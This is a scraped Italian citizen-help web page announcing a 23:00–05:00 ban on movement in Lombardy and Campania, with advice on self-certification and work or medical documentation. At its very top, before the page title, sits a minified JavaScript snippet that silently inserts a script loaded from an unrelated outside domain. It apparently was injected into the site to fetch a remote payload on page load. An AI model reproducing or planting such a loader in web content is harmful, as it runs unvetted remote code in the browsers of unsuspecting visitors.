;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); È in vigore il "coprifuoco" dalle 23 alle 5 - Sportello Amico Del Cittadino
Divieto di spostamenti dalle 23 alle 5
Divieto di spostamenti dalle 23 alle 5

È in vigore il “coprifuoco” dalle 23 alle 5

Alla fine è stata avallata anche dal Governo l’ordinanza in vigore da oggi che vieta gli spostamenti dalla ore 23.00 alle ore 5.00 in Lombardia e Campania. Si ritorna così alle autocertificazioni

Come disposto dall’ordinanza che potete leggere qui https://www.lombardianotizie.online/nuove-ordinanze-lombardia/ saranno consentiti solamente gli spostamenti per lavoro o per motivi di salute, documentati tramite autocertificazione, che potrà essere verificata dalle autorità preposte.

Al momento in cui scriviamo, non sono stati ancora predisposti i moduli per l’autocertificazione: suggeriamo nel frattempo di chiedere documentazione scritta da datore di lavoro/committente che attesti lo svolgimento di attività lavorativa nella fascia 23.00-5.00 (es. una lettera oppure copia del contratto di lavoro) o di avere documentazione medica o di poter fare contattare un medico/personale sanitario in caso di emergenze.

Sportello Amico del Cittadino diffonderà eventuali aggiornamenti circa la situazione.
Per informazioni:
🖥 info@sportello-amico.it
📞 +39 0331 262045

Cerca anche

CORSI DI LAUREA

Essere audaci, ambiziosi, combattivi nel lavoro migliorando le proprie prospettive occupazionali è possibile.I Corsi di …

Dona il tuo 5x1000 ad Salesiani per il sociale
Scrivimi
Come posso aiutarti?
Buongiorno! 👋
i nostri uffici sono a vostra disposizione, chatta con noi !